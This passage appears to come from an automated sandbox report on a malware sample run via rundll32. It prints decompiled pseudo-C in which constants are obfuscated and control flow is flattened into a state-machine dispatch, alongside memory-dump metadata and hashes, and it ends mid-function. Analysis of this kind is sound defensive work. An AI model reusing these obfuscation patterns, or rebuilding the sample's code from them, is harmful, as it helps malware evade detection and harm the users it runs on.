                                                                                                                    • Instruction ID: c80b0e8136a420f63ed013eeb41e76421789ad6ba88c785d7396a23983e550f4
                                                                                                                    • Opcode Fuzzy Hash: af9e1fa6d42ca2ef492040537a1319c052bf9d5522c3d27ce82b2ba089b66b4c
                                                                                                                    • Instruction Fuzzy Hash: 7FD10EB11083819FD765CF66C48995BBBF1FBC4748F50891DF2A68A220C7B6D549CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E0034C631(void* __ecx) {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				unsigned int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				void* _t214;
                                                                                                                    				void* _t220;
                                                                                                                    				void* _t224;
                                                                                                                    				void* _t228;
                                                                                                                    				void* _t229;
                                                                                                                    				void* _t233;
                                                                                                                    				void* _t234;
                                                                                                                    				signed int _t236;
                                                                                                                    				signed int _t237;
                                                                                                                    				signed int _t238;
                                                                                                                    				void* _t248;
                                                                                                                    				void* _t249;
                                                                                                                    				signed int* _t251;
                                                                                                                    				void* _t254;
                                                                                                                    
                                                                                                                    				_t251 =  &_v92;
                                                                                                                    				_t234 = __ecx;
                                                                                                                    				_v56 = 0x6c25e6;
                                                                                                                    				_v56 = _v56 >> 0xf;
                                                                                                                    				_v56 = _v56 >> 0xd;
                                                                                                                    				_v56 = _v56 ^ 0x000b07b8;
                                                                                                                    				_v60 = 0xfeb19f;
                                                                                                                    				_v60 = _v60 | 0xe5cfed25;
                                                                                                                    				_v60 = _v60 ^ 0x26a25afc;
                                                                                                                    				_v60 = _v60 ^ 0xc355f8a5;
                                                                                                                    				_v20 = 0x71f317;
                                                                                                                    				_v20 = _v20 >> 1;
                                                                                                                    				_v20 = _v20 ^ 0x003a157d;
                                                                                                                    				_v64 = 0x229c82;
                                                                                                                    				_v64 = _v64 >> 6;
                                                                                                                    				_v64 = _v64 + 0x6845;
                                                                                                                    				_v64 = _v64 ^ 0x000e1a2d;
                                                                                                                    				_v80 = 0xaa3c23;
                                                                                                                    				_v80 = _v80 + 0x9f20;
                                                                                                                    				_v80 = _v80 + 0x8b23;
                                                                                                                    				_v80 = _v80 | 0x21cd8be9;
                                                                                                                    				_v80 = _v80 ^ 0x21ed2977;
                                                                                                                    				_v84 = 0xa275e1;
                                                                                                                    				_v84 = _v84 >> 0xd;
                                                                                                                    				_t248 = 0;
                                                                                                                    				_t236 = 0x36;
                                                                                                                    				_v84 = _v84 / _t236;
                                                                                                                    				_v84 = _v84 | 0x6f301759;
                                                                                                                    				_t249 = 0xe982267;
                                                                                                                    				_v84 = _v84 ^ 0x6f339045;
                                                                                                                    				_v88 = 0x6e61be;
                                                                                                                    				_v88 = _v88 ^ 0xaf54e0d1;
                                                                                                                    				_v88 = _v88 >> 4;
                                                                                                                    				_v88 = _v88 | 0xfa70c1e6;
                                                                                                                    				_v88 = _v88 ^ 0xfaf0db59;
                                                                                                                    				_v8 = 0x2c245a;
                                                                                                                    				_v8 = _v8 << 8;
                                                                                                                    				_v8 = _v8 ^ 0x2c2bf9b3;
                                                                                                                    				_v36 = 0xcb696d;
                                                                                                                    				_v36 = _v36 >> 4;
                                                                                                                    				_v36 = _v36 << 5;
                                                                                                                    				_v36 = _v36 ^ 0x019dc7aa;
                                                                                                                    				_v76 = 0xb5019c;
                                                                                                                    				_v76 = _v76 + 0xffffd3ce;
                                                                                                                    				_t237 = 0x3a;
                                                                                                                    				_v76 = _v76 / _t237;
                                                                                                                    				_v76 = _v76 + 0xe675;
                                                                                                                    				_v76 = _v76 ^ 0x000db5c6;
                                                                                                                    				_v40 = 0x1e681a;
                                                                                                                    				_t238 = 0x22;
                                                                                                                    				_v40 = _v40 / _t238;
                                                                                                                    				_v40 = _v40 + 0x9449;
                                                                                                                    				_v40 = _v40 ^ 0x00094c29;
                                                                                                                    				_v12 = 0x15a3d6;
                                                                                                                    				_v12 = _v12 * 0x6f;
                                                                                                                    				_v12 = _v12 ^ 0x096cbb26;
                                                                                                                    				_v44 = 0x420567;
                                                                                                                    				_v44 = _v44 * 0x2b;
                                                                                                                    				_v44 = _v44 >> 8;
                                                                                                                    				_v44 = _v44 ^ 0x0004b329;
                                                                                                                    				_v24 = 0xd75fdc;
                                                                                                                    				_v24 = _v24 + 0x1e6b;
                                                                                                                    				_v24 = _v24 ^ 0x00df7832;
                                                                                                                    				_v92 = 0x2978f4;
                                                                                                                    				_v92 = _v92 ^ 0x1aa3462f;
                                                                                                                    				_v92 = _v92 * 0x3a;
                                                                                                                    				_v92 = _v92 | 0xa828e589;
                                                                                                                    				_v92 = _v92 ^ 0xab738ef3;
                                                                                                                    				_v28 = 0xea47cd;
                                                                                                                    				_v28 = _v28 * 0x68;
                                                                                                                    				_v28 = _v28 ^ 0x5f2069e4;
                                                                                                                    				_v16 = 0x52c32f;
                                                                                                                    				_v16 = _v16 | 0xda6d254c;
                                                                                                                    				_v16 = _v16 ^ 0xda7308ab;
                                                                                                                    				_v48 = 0xc39de2;
                                                                                                                    				_v48 = _v48 ^ 0x402eeacb;
                                                                                                                    				_v48 = _v48 + 0xb85a;
                                                                                                                    				_v48 = _v48 ^ 0x40eaab85;
                                                                                                                    				_v52 = 0xbb994d;
                                                                                                                    				_v52 = _v52 | 0x0bb22e40;
                                                                                                                    				_v52 = _v52 ^ 0x7c36a9dd;
                                                                                                                    				_v52 = _v52 ^ 0x7782b78d;
                                                                                                                    				_v68 = 0x6ee7f1;
                                                                                                                    				_v68 = _v68 * 3;
                                                                                                                    				_v68 = _v68 * 0x65;
                                                                                                                    				_v68 = _v68 + 0xffffc283;
                                                                                                                    				_v68 = _v68 ^ 0x834839c0;
                                                                                                                    				_v4 = 0x2c076e;
                                                                                                                    				_v4 = _v4 >> 2;
                                                                                                                    				_v4 = _v4 ^ 0x00027705;
                                                                                                                    				_v32 = 0x2be47d;
                                                                                                                    				_v32 = _v32 >> 3;
                                                                                                                    				_v32 = _v32 << 0x10;
                                                                                                                    				_v32 = _v32 ^ 0x7c8953c8;
                                                                                                                    				_v72 = 0x664751;
                                                                                                                    				_v72 = _v72 + 0xffffb67a;
                                                                                                                    				_v72 = _v72 + 0xf05a;
                                                                                                                    				_v72 = _v72 + 0xffff370a;
                                                                                                                    				_v72 = _v72 ^ 0x0066b29b;
                                                                                                                    				goto L1;
                                                                                                                    				do {
                                                                                                                    					while(1) {
                                                                                                                    						L1:
                                                                                                                    						_t254 = _t249 - 0xe145aac;
                                                                                                                    						if(_t254 > 0) {
                                                                                                                    							break;
                                                                                                                    						}
                                                                                                                    						if(_t254 == 0) {
                                                                                                                    							_push(_t238);
                                                                                                                    							_push(_t238);
                                                                                                                    							_t220 = E0033474B();
                                                                                                                    							_t251 =  &(_t251[2]);
                                                                                                                    							_t249 = 0x70e2d06;
                                                                                                                    							_t248 = _t248 + _t220;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t249 == 0x15047ce) {
                                                                                                                    								_push(_t238);
                                                                                                                    								_push(_t238);
                                                                                                                    								_t224 = E0033474B();
                                                                                                                    								_t251 =  &(_t251[2]);
                                                                                                                    								_t249 = 0xe32aaf2;
                                                                                                                    								_t248 = _t248 + _t224;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t249 == 0x4d33fe3) {
                                                                                                                    									_push(_t238);
                                                                                                                    									_push(_t238);
                                                                                                                    									_t228 = E0033474B();
                                                                                                                    									_t251 =  &(_t251[2]);
                                                                                                                    									_t249 = 0xe45b300;
                                                                                                                    									_t248 = _t248 + _t228;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t249 == 0x708a22e) {
                                                                                                                    										_t238 = _v56;
                                                                                                                    										_t229 = E0034C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
                                                                                                                    										_t251 =  &(_t251[3]);
                                                                                                                    										_t249 = 0x15047ce;
                                                                                                                    										_t248 = _t248 + _t229;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t249 != 0x70e2d06) {
                                                                                                                    											goto L17;
                                                                                                                    										} else {
                                                                                                                    											_push(_t238);
                                                                                                                    											_push(_t238);
                                                                                                                    											_t233 = E0033474B();
                                                                                                                    											_t251 =  &(_t251[2]);
                                                                                                                    											_t249 = 0x4d33fe3;
                                                                                                                    											_t248 = _t248 + _t233;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L20:
                                                                                                                    						return _t248;
                                                                                                                    					}
                                                                                                                    					if(_t249 == 0xe32aaf2) {
                                                                                                                    						_push(_t238);
                                                                                                                    						_push(_t238);
                                                                                                                    						_t214 = E0033474B();
                                                                                                                    						_t251 =  &(_t251[2]);
                                                                                                                    						_t249 = 0xe145aac;
                                                                                                                    						_t248 = _t248 + _t214;
                                                                                                                    						goto L17;
                                                                                                                    					} else {
                                                                                                                    						if(_t249 == 0xe45b300) {
                                                                                                                    							_t248 = _t248 + E0034C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
                                                                                                                    						} else {
                                                                                                                    							if(_t249 != 0xe982267) {
                                                                                                                    								goto L17;
                                                                                                                    							} else {
                                                                                                                    								_t249 = 0x708a22e;
                                                                                                                    								goto L1;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					goto L20;
                                                                                                                    					L17:
                                                                                                                    				} while (_t249 != 0xce30a1f);
                                                                                                                    				goto L20;
                                                                                                                    			}

                                                                                                                    0x0034ca32
                                                                                                                    0x00000000
                                                                                                                    0x0034ca00
                                                                                                                    0x0034ca06
                                                                                                                    0x0034ca5d
                                                                                                                    0x0034ca08
                                                                                                                    0x0034ca0e
                                                                                                                    0x00000000
                                                                                                                    0x0034ca10
                                                                                                                    0x0034ca10
                                                                                                                    0x00000000
                                                                                                                    0x0034ca10
                                                                                                                    0x0034ca0e
                                                                                                                    0x0034ca06
                                                                                                                    0x00000000
                                                                                                                    0x0034ca34
                                                                                                                    0x0034ca34
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                    • API String ID: 0-1553751006
                                                                                                                    • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                    • Instruction ID: 5056e3c911e93ddb833111347c7a6487fa6045ce8a0e57947708346ce8e1343c
                                                                                                                    • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                    • Instruction Fuzzy Hash: E8A141B28193409FC389CF25D48A40FFBE1BB85748F515A1DF595AA220D3B5EA48CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034F435(intOrPtr* __ecx, signed int __edx) {
                                                                                                                    				char _v128;
                                                                                                                    				char _v256;
                                                                                                                    				char _v288;
                                                                                                                    				intOrPtr _v292;
                                                                                                                    				signed int _v296;
                                                                                                                    				signed int _v300;
                                                                                                                    				signed int _v304;
                                                                                                                    				signed int _v308;
                                                                                                                    				signed int _v312;
                                                                                                                    				signed int _v316;
                                                                                                                    				signed int _v320;
                                                                                                                    				signed int _v324;
                                                                                                                    				signed int _v328;
                                                                                                                    				signed int _v332;
                                                                                                                    				signed int _v336;
                                                                                                                    				signed int _v340;
                                                                                                                    				signed int _v344;
                                                                                                                    				signed int _v348;
                                                                                                                    				signed int _v352;
                                                                                                                    				signed int _v356;
                                                                                                                    				signed int _v360;
                                                                                                                    				signed int _v364;
                                                                                                                    				signed int _v368;
                                                                                                                    				signed int _v372;
                                                                                                                    				signed int _v376;
                                                                                                                    				signed int _v380;
                                                                                                                    				signed int _v384;
                                                                                                                    				signed int _v388;
                                                                                                                    				signed int _v392;
                                                                                                                    				signed int _v396;
                                                                                                                    				signed int _v400;
                                                                                                                    				signed int _v404;
                                                                                                                    				signed int _v408;
                                                                                                                    				signed int _v412;
                                                                                                                    				signed int _v416;
                                                                                                                    				signed int _v420;
                                                                                                                    				signed int _v424;
                                                                                                                    				signed int _v428;
                                                                                                                    				signed int _v432;
                                                                                                                    				signed int _v436;
                                                                                                                    				signed int _v440;
                                                                                                                    				signed int _v444;
                                                                                                                    				signed int _v448;
                                                                                                                    				signed int _v452;
                                                                                                                    				intOrPtr* _v456;
                                                                                                                    				signed int _v460;
                                                                                                                    				signed int _v464;
                                                                                                                    				signed int _v468;
                                                                                                                    				signed int _v472;
                                                                                                                    				signed int _v476;
                                                                                                                    				signed int _v480;
                                                                                                                    				signed int _v484;
                                                                                                                    				signed int _v488;
                                                                                                                    				signed int _v492;
                                                                                                                    				signed int _v496;
                                                                                                                    				signed int _v500;
                                                                                                                    				signed int _v504;
                                                                                                                    				signed int _v508;
                                                                                                                    				signed int _v512;
                                                                                                                    				signed int _v516;
                                                                                                                    				signed int _v520;
                                                                                                                    				void* _t551;
                                                                                                                    				void* _t554;
                                                                                                                    				signed int _t560;
                                                                                                                    				void* _t563;
                                                                                                                    				int _t566;
                                                                                                                    				void* _t580;
                                                                                                                    				signed int* _t582;
                                                                                                                    				void* _t587;
                                                                                                                    				signed int _t595;
                                                                                                                    				void* _t598;
                                                                                                                    				signed int _t601;
                                                                                                                    				signed int _t602;
                                                                                                                    				signed int _t603;
                                                                                                                    				intOrPtr* _t610;
                                                                                                                    				signed int _t634;
                                                                                                                    				void* _t659;
                                                                                                                    				signed int _t675;
                                                                                                                    				signed int _t676;
                                                                                                                    				signed int _t677;
                                                                                                                    				signed int _t678;
                                                                                                                    				signed int _t679;
                                                                                                                    				signed int _t680;
                                                                                                                    				void* _t682;
                                                                                                                    				void* _t683;
                                                                                                                    				void* _t686;
                                                                                                                    				void* _t687;
                                                                                                                    				signed int _t692;
                                                                                                                    				signed int _t693;
                                                                                                                    				signed int* _t694;
                                                                                                                    				void* _t698;
                                                                                                                    
                                                                                                                    				_t694 =  &_v520;
                                                                                                                    				_v296 = __edx;
                                                                                                                    				_v456 = __ecx;
                                                                                                                    				_v308 = 0x7c82e0;
                                                                                                                    				_v308 = _v308 ^ 0x9529f8b7;
                                                                                                                    				_v308 = _v308 ^ 0x95557a57;
                                                                                                                    				_v444 = 0xbd655a;
                                                                                                                    				_v444 = _v444 + 0x6586;
                                                                                                                    				_v444 = _v444 + 0xffff1486;
                                                                                                                    				_v444 = _v444 ^ 0x00b10b5d;
                                                                                                                    				_v360 = 0x6df28f;
                                                                                                                    				_v360 = _v360 >> 0xc;
                                                                                                                    				_v360 = _v360 ^ 0xc93a0f00;
                                                                                                                    				_v360 = _v360 ^ 0xc93b57a7;
                                                                                                                    				_v380 = 0x803da4;
                                                                                                                    				_v380 = _v380 + 0x81b0;
                                                                                                                    				_v380 = _v380 << 0x10;
                                                                                                                    				_v380 = _v380 ^ 0xbf59b73f;
                                                                                                                    				_v484 = 0xdeaf13;
                                                                                                                    				_v484 = _v484 | 0x05ba16e8;
                                                                                                                    				_v484 = _v484 + 0xffff5e7b;
                                                                                                                    				_v484 = _v484 + 0x21a5;
                                                                                                                    				_v484 = _v484 ^ 0x05f35408;
                                                                                                                    				_v516 = 0x9c12e3;
                                                                                                                    				_v516 = _v516 >> 5;
                                                                                                                    				_v516 = _v516 + 0x3879;
                                                                                                                    				_t686 = 0x618a3a9;
                                                                                                                    				_t676 = 0x46;
                                                                                                                    				_v516 = _v516 / _t676;
                                                                                                                    				_v516 = _v516 ^ 0x000beb5e;
                                                                                                                    				_v404 = 0x49e9fe;
                                                                                                                    				_v404 = _v404 + 0x1375;
                                                                                                                    				_v404 = _v404 | 0x014362a3;
                                                                                                                    				_v404 = _v404 ^ 0x01430578;
                                                                                                                    				_v408 = 0xd49d0c;
                                                                                                                    				_v408 = _v408 + 0x89ee;
                                                                                                                    				_v408 = _v408 | 0xbbfa4d8a;
                                                                                                                    				_v408 = _v408 ^ 0xbbf95772;
                                                                                                                    				_v504 = 0x33cefe;
                                                                                                                    				_v504 = _v504 >> 0xa;
                                                                                                                    				_v504 = _v504 >> 0xd;
                                                                                                                    				_v504 = _v504 + 0xffff4738;
                                                                                                                    				_v504 = _v504 ^ 0xfff61340;
                                                                                                                    				_v388 = 0x38423a;
                                                                                                                    				_t75 =  &_v388; // 0x38423a
                                                                                                                    				_t601 = 0x7b;
                                                                                                                    				_v388 =  *_t75 * 0x2c;
                                                                                                                    				_v388 = _v388 + 0x7a90;
                                                                                                                    				_v388 = _v388 ^ 0x09a92ca6;
                                                                                                                    				_v396 = 0x89c34a;
                                                                                                                    				_v396 = _v396 >> 6;
                                                                                                                    				_v396 = _v396 | 0xaa955d3e;
                                                                                                                    				_v396 = _v396 ^ 0xaa9cf099;
                                                                                                                    				_v316 = 0x54e1fb;
                                                                                                                    				_v316 = _v316 + 0xffff88b2;
                                                                                                                    				_v316 = _v316 ^ 0x0053b1cb;
                                                                                                                    				_v392 = 0xd67855;
                                                                                                                    				_v392 = _v392 + 0xd739;
                                                                                                                    				_v392 = _v392 * 0x34;
                                                                                                                    				_v392 = _v392 ^ 0x2bb8cf2c;
                                                                                                                    				_v512 = 0x9dc1ac;
                                                                                                                    				_v512 = _v512 | 0xff1b5e8c;
                                                                                                                    				_v512 = _v512 / _t601;
                                                                                                                    				_v512 = _v512 + 0xc237;
                                                                                                                    				_v512 = _v512 ^ 0x02115509;
                                                                                                                    				_v368 = 0xb0c27;
                                                                                                                    				_v368 = _v368 * 0x3a;
                                                                                                                    				_v368 = _v368 + 0x9417;
                                                                                                                    				_v368 = _v368 ^ 0x028ae81d;
                                                                                                                    				_v352 = 0x7ea940;
                                                                                                                    				_v352 = _v352 + 0xffff6a40;
                                                                                                                    				_v352 = _v352 | 0x1d7a7563;
                                                                                                                    				_v352 = _v352 ^ 0x1d74a207;
                                                                                                                    				_v340 = 0xd37cb9;
                                                                                                                    				_v340 = _v340 >> 5;
                                                                                                                    				_v340 = _v340 ^ 0x00021b7e;
                                                                                                                    				_v384 = 0xc54f7c;
                                                                                                                    				_v384 = _v384 | 0xe1c129a4;
                                                                                                                    				_v384 = _v384 << 6;
                                                                                                                    				_v384 = _v384 ^ 0x7152788e;
                                                                                                                    				_v320 = 0xafdf9b;
                                                                                                                    				_v320 = _v320 | 0x588bef45;
                                                                                                                    				_v320 = _v320 ^ 0x58ad1127;
                                                                                                                    				_v508 = 0x7882a6;
                                                                                                                    				_v508 = _v508 ^ 0x5ae648f7;
                                                                                                                    				_t677 = 0x7e;
                                                                                                                    				_v508 = _v508 / _t677;
                                                                                                                    				_v508 = _v508 + 0xffff266f;
                                                                                                                    				_v508 = _v508 ^ 0x00b4570c;
                                                                                                                    				_v344 = 0x25ec7c;
                                                                                                                    				_t158 =  &_v344; // 0x25ec7c
                                                                                                                    				_t692 = 0x77;
                                                                                                                    				_v344 =  *_t158 * 0x48;
                                                                                                                    				_v344 = _v344 ^ 0x0aab681c;
                                                                                                                    				_v332 = 0xac456;
                                                                                                                    				_v332 = _v332 ^ 0x143b2d92;
                                                                                                                    				_v332 = _v332 ^ 0x1438ce6d;
                                                                                                                    				_v436 = 0x1dd68;
                                                                                                                    				_v436 = _v436 + 0x1e14;
                                                                                                                    				_v436 = _v436 / _t692;
                                                                                                                    				_v436 = _v436 ^ 0x000407e3;
                                                                                                                    				_v468 = 0x975814;
                                                                                                                    				_v468 = _v468 | 0x165c3dad;
                                                                                                                    				_v468 = _v468 >> 3;
                                                                                                                    				_v468 = _v468 + 0x9a99;
                                                                                                                    				_v468 = _v468 ^ 0x02d4af38;
                                                                                                                    				_v428 = 0xd1fa32;
                                                                                                                    				_v428 = _v428 + 0x34cd;
                                                                                                                    				_v428 = _v428 >> 0xa;
                                                                                                                    				_v428 = _v428 ^ 0x000c7c43;
                                                                                                                    				_v372 = 0xb93604;
                                                                                                                    				_v372 = _v372 >> 0xb;
                                                                                                                    				_v372 = _v372 + 0x569f;
                                                                                                                    				_v372 = _v372 ^ 0x0001c97c;
                                                                                                                    				_v312 = 0xb8b780;
                                                                                                                    				_v312 = _v312 / _t601;
                                                                                                                    				_v312 = _v312 ^ 0x0009bb57;
                                                                                                                    				_v364 = 0xc6b8c5;
                                                                                                                    				_v364 = _v364 >> 4;
                                                                                                                    				_v364 = _v364 << 0xf;
                                                                                                                    				_v364 = _v364 ^ 0x35c8234d;
                                                                                                                    				_v500 = 0x5d2db3;
                                                                                                                    				_v500 = _v500 | 0xa4ec7bca;
                                                                                                                    				_v500 = _v500 * 0x42;
                                                                                                                    				_v500 = _v500 + 0xffff6871;
                                                                                                                    				_v500 = _v500 ^ 0x8955fb09;
                                                                                                                    				_v492 = 0xf8ac1c;
                                                                                                                    				_v492 = _v492 + 0xd489;
                                                                                                                    				_v492 = _v492 | 0x938b5662;
                                                                                                                    				_v492 = _v492 << 6;
                                                                                                                    				_v492 = _v492 ^ 0xfef6fac0;
                                                                                                                    				_v356 = 0x80a8a7;
                                                                                                                    				_v356 = _v356 >> 3;
                                                                                                                    				_v356 = _v356 + 0xffff1aa9;
                                                                                                                    				_v356 = _v356 ^ 0x00023cc5;
                                                                                                                    				_v420 = 0x29f504;
                                                                                                                    				_v420 = _v420 ^ 0x96d25191;
                                                                                                                    				_v420 = _v420 << 0xa;
                                                                                                                    				_v420 = _v420 ^ 0xee96722c;
                                                                                                                    				_v476 = 0x6526e6;
                                                                                                                    				_t250 =  &_v476; // 0x6526e6
                                                                                                                    				_t602 = 9;
                                                                                                                    				_t678 = 0x5e;
                                                                                                                    				_v476 =  *_t250 * 0x65;
                                                                                                                    				_t252 =  &_v476; // 0x6526e6
                                                                                                                    				_v476 =  *_t252 * 0x5d;
                                                                                                                    				_v476 = _v476 + 0xffffa50d;
                                                                                                                    				_v476 = _v476 ^ 0x7f6d4504;
                                                                                                                    				_v304 = 0x6f90;
                                                                                                                    				_v304 = _v304 + 0xffffb625;
                                                                                                                    				_v304 = _v304 ^ 0x0000ce69;
                                                                                                                    				_v348 = 0xd48165;
                                                                                                                    				_v348 = _v348 * 0x4f;
                                                                                                                    				_v348 = _v348 + 0xa298;
                                                                                                                    				_v348 = _v348 ^ 0x41980148;
                                                                                                                    				_v412 = 0x7e685b;
                                                                                                                    				_t271 =  &_v412; // 0x7e685b
                                                                                                                    				_v412 =  *_t271 * 0x1d;
                                                                                                                    				_v412 = _v412 >> 0xe;
                                                                                                                    				_v412 = _v412 ^ 0x000f1110;
                                                                                                                    				_v460 = 0xd80dae;
                                                                                                                    				_v460 = _v460 * 0x4a;
                                                                                                                    				_v460 = _v460 << 9;
                                                                                                                    				_v460 = _v460 >> 5;
                                                                                                                    				_v460 = _v460 ^ 0x073a202e;
                                                                                                                    				_v324 = 0x2acd4f;
                                                                                                                    				_v324 = _v324 ^ 0x1744d618;
                                                                                                                    				_v324 = _v324 ^ 0x1766082c;
                                                                                                                    				_v400 = 0xe6723b;
                                                                                                                    				_v400 = _v400 ^ 0x220d80d9;
                                                                                                                    				_v400 = _v400 ^ 0x0161a8c1;
                                                                                                                    				_v400 = _v400 ^ 0x238d1a3c;
                                                                                                                    				_v376 = 0xaaa6;
                                                                                                                    				_v376 = _v376 + 0xd31a;
                                                                                                                    				_v376 = _v376 + 0xfffff53b;
                                                                                                                    				_v376 = _v376 ^ 0x00079406;
                                                                                                                    				_v452 = 0xe6cc76;
                                                                                                                    				_v452 = _v452 ^ 0xa4c29e28;
                                                                                                                    				_v452 = _v452 / _t602;
                                                                                                                    				_v452 = _v452 ^ 0x123fe3c8;
                                                                                                                    				_v520 = 0x822cac;
                                                                                                                    				_v520 = _v520 / _t678;
                                                                                                                    				_v520 = _v520 << 4;
                                                                                                                    				_v520 = _v520 << 9;
                                                                                                                    				_v520 = _v520 ^ 0x2c5f9d39;
                                                                                                                    				_v440 = 0xafb195;
                                                                                                                    				_v440 = _v440 + 0xffff123a;
                                                                                                                    				_v440 = _v440 >> 0xa;
                                                                                                                    				_v440 = _v440 ^ 0x0003dc41;
                                                                                                                    				_v448 = 0xdf86e4;
                                                                                                                    				_v448 = _v448 ^ 0xac60bb5d;
                                                                                                                    				_v448 = _v448 ^ 0x5238faed;
                                                                                                                    				_v448 = _v448 ^ 0xfe8be764;
                                                                                                                    				_v336 = 0x3e14c9;
                                                                                                                    				_v336 = _v336 << 7;
                                                                                                                    				_v336 = _v336 ^ 0x1f0fc953;
                                                                                                                    				_v496 = 0x4885f3;
                                                                                                                    				_v496 = _v496 * 0x25;
                                                                                                                    				_v496 = _v496 + 0x3aa8;
                                                                                                                    				_v496 = _v496 + 0xffff73aa;
                                                                                                                    				_v496 = _v496 ^ 0x0a7b30ee;
                                                                                                                    				_v480 = 0xca6b34;
                                                                                                                    				_v480 = _v480 >> 9;
                                                                                                                    				_v480 = _v480 + 0xfb6a;
                                                                                                                    				_v480 = _v480 / _t692;
                                                                                                                    				_v480 = _v480 ^ 0x000164ed;
                                                                                                                    				_v432 = 0xb19133;
                                                                                                                    				_t679 = 0x63;
                                                                                                                    				_t693 = _v296;
                                                                                                                    				_v432 = _v432 * 0x53;
                                                                                                                    				_v432 = _v432 >> 0x10;
                                                                                                                    				_v432 = _v432 ^ 0x00018cb4;
                                                                                                                    				_v328 = 0xdb466c;
                                                                                                                    				_t603 = _v296;
                                                                                                                    				_v328 = _v328 / _t679;
                                                                                                                    				_v328 = _v328 ^ 0x000e2190;
                                                                                                                    				_v488 = 0xd48740;
                                                                                                                    				_t680 = 0x44;
                                                                                                                    				_v488 = _v488 * 7;
                                                                                                                    				_v488 = _v488 * 0x66;
                                                                                                                    				_v488 = _v488 + 0x34f;
                                                                                                                    				_v488 = _v488 ^ 0x50c19e73;
                                                                                                                    				_v424 = 0xacfab2;
                                                                                                                    				_v424 = _v424 / _t680;
                                                                                                                    				_v424 = _v424 | 0xedf008b5;
                                                                                                                    				_v424 = _v424 ^ 0xedf22909;
                                                                                                                    				_v472 = 0x2e74a8;
                                                                                                                    				_v472 = _v472 * 0x3f;
                                                                                                                    				_v472 = _v472 ^ 0x6424471f;
                                                                                                                    				_v472 = _v472 >> 0xb;
                                                                                                                    				_v472 = _v472 ^ 0x0009d0c0;
                                                                                                                    				_v416 = 0x7e19d4;
                                                                                                                    				_v416 = _v416 << 0xd;
                                                                                                                    				_v416 = _v416 + 0x1081;
                                                                                                                    				_v416 = _v416 ^ 0xc3344569;
                                                                                                                    				_v464 = 0xa74bb7;
                                                                                                                    				_v464 = _v464 >> 0xb;
                                                                                                                    				_v464 = _v464 + 0x9c4;
                                                                                                                    				_v464 = _v464 >> 6;
                                                                                                                    				_v464 = _v464 ^ 0x000976a8;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t551 = 0xf168e34;
                                                                                                                    					do {
                                                                                                                    						while(1) {
                                                                                                                    							L2:
                                                                                                                    							_t698 = _t686 - 0x7498ebf;
                                                                                                                    							if(_t698 > 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							if(_t698 == 0) {
                                                                                                                    								_push(_v496);
                                                                                                                    								_push(_v336);
                                                                                                                    								_push(_v448);
                                                                                                                    								_t580 = E00337F1D(_v480, _t603, _v432, E00348606(_v440, 0x331560, __eflags), _v328, _v292 - _t603, _v488);
                                                                                                                    								E0033A8B0(_v424, _t577, _v472);
                                                                                                                    								_t582 = _v296;
                                                                                                                    								 *_t582 = _t693;
                                                                                                                    								_t582[1] = _t603 + _t580 - _t693;
                                                                                                                    								goto L29;
                                                                                                                    							}
                                                                                                                    							if(_t686 == 0x488924) {
                                                                                                                    								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                    								_push(_t610);
                                                                                                                    								_push(_t610);
                                                                                                                    								_t693 = E00337FF2(_t682);
                                                                                                                    								__eflags = _t693;
                                                                                                                    								_t551 = 0xf168e34;
                                                                                                                    								_t610 = _v456;
                                                                                                                    								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							if(_t686 == 0x123a276) {
                                                                                                                    								_push(_v468);
                                                                                                                    								_push(_v436);
                                                                                                                    								_t587 = E0034DCF7(_v332, 0x3315c0, __eflags);
                                                                                                                    								_push( &_v256);
                                                                                                                    								_push(_t587);
                                                                                                                    								_push(_t682);
                                                                                                                    								_push(_v300);
                                                                                                                    								 *((intOrPtr*)(E0033A42D(0xab2a8d8a, 0x2b7)))();
